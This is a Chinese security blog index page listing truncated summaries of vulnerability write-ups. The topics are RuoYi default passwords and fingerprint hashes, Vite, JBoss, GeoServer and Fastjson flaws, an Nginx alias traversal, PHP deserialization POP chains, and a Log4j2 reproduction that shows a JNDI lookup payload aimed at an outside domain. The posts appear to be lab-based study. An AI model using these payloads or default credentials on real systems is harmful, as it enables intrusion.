会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
x3cc
博客园
首页
新随笔
联系
订阅
管理
2025年9月18日
若依(RuoYi)框架漏洞总结
摘要: 0x01 特征 绿若依 icon_hash=”706913071” 蓝若依 icon_hash=” -1231872293” 0x02 漏洞 弱口令 用户:admin ruoyi druid 密码:123456 admin druid admin123 admin888 若依前台默认shiro ke
阅读全文
posted @ 2025-09-18 17:27 x3c
阅读(327)
评论(0)
推荐(0)
2025年9月10日
CVE-2025-30208 Vite开发服务器任意文件读取漏洞
摘要: 漏洞描述 在Vite的开发服务器(dev server)模式下,由于路径处理存在缺陷,攻击者可以构造特殊的请求路径,绕过正常的资源服务规则,从而读取项目根目录之外的任意文件。 漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(如?raw??或?import&raw??)时,V
阅读全文
posted @ 2025-09-10 16:49 x3c
阅读(30)
评论(0)
推荐(0)
JBOSS CVE-2017-7504 反序列化漏洞
摘要: 辨别版本 有时候我们需要对外网的JBoss的版本进行快速辨别,使用不同的攻击载荷探针进行漏洞探测确认。 通过访问接口辨别 JBoss 4.x(4.0.5)接口特征 /jbossmq-httpil/HTTPServerILServlet接口: JBoss 6.x(6.1.0)接口特征 直接使用工具打进
阅读全文
posted @ 2025-09-10 09:57 x3c
阅读(12)
评论(0)
推荐(0)
2025年9月9日
GeoServer 远程代码执行漏洞 CVE-2024-36401
摘要: 漏洞描述 GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC
阅读全文
posted @ 2025-09-09 08:46 x3c
阅读(108)
评论(0)
推荐(0)
2025年9月8日
Fastjson 1.2.47 远程代码执行
摘要: 靶场搭建 直接使用极核靶场 https://hackhub.get-shell.com/games/4/challenges#16-Fastjson-1.2.47 %E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C 靶场 首页 发现登录页面,
阅读全文
posted @ 2025-09-08 18:14 x3c
阅读(11)
评论(0)
推荐(0)
Log4j2 CVE-2021-44228 漏洞复现
摘要: 环境搭建 直接使用极核GetShell靶场 https://hackhub.get-shell.com/ 靶场 Solar系统存在漏洞路径可以传参 http://domain/solr/admin/cores?action= ${jndi:ldap://${sys:java.version}.exa
阅读全文
posted @ 2025-09-08 16:18 x3c
阅读(32)
评论(0)
推荐(0)
2025年8月26日
靶场复现
摘要: 1--访问页面是个nginx页面 Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。 在如下配置中设置目录别名时/files配置为/home/的别名,那么当我们访问/files…/时,nginx实际处理的路径时/home/…/,从而实现了穿越目录。 2--扫描目录 3-
阅读全文
posted @ 2025-08-26 16:22 x3c
阅读(20)
评论(0)
推荐(0)
2025年8月20日
靶场渗透复现
摘要: 拿到资产ip进行端口扫描 --发现端口开放访问一下,是个后台管理系统 --尝试爆破了一下无果,尝试进行目录扫描。 --扫描后发现phpmyadmin,尝试登陆发现弱口令root/root --这里查看数据库有没有能利用的,看到images库下有key6表 --查询表内容,拿到key值 --拿到了数据
阅读全文
posted @ 2025-08-20 17:39 x3c
阅读(15)
评论(0)
推荐(0)
2025年8月15日
PHP反序列化漏洞学习-POP链
摘要: 成员属性存放对象!! 成员属性存放对象!! 成员属性存放对象!! 入门学习POP链,一般使用反推法 直接看例题 例1:橙子 <?php class index { private $test; public function __construct(){ $this->test = new norm
阅读全文
posted @ 2025-08-15 17:30 x3c
阅读(22)
评论(0)
推荐(0)
2025年8月13日
PHP反序列化漏洞学习
摘要: 1、类与对象 <?php class hero{ //定义一个类 var $name; //定义一个成员属性 var $sex; function jineng($var1) { //定义一个成员方法 echo $this->name; //输出name echo $var1; } } $cyj=
阅读全文
posted @ 2025-08-13 20:18 x3c
阅读(11)
评论(0)
推荐(0)
下一页
公告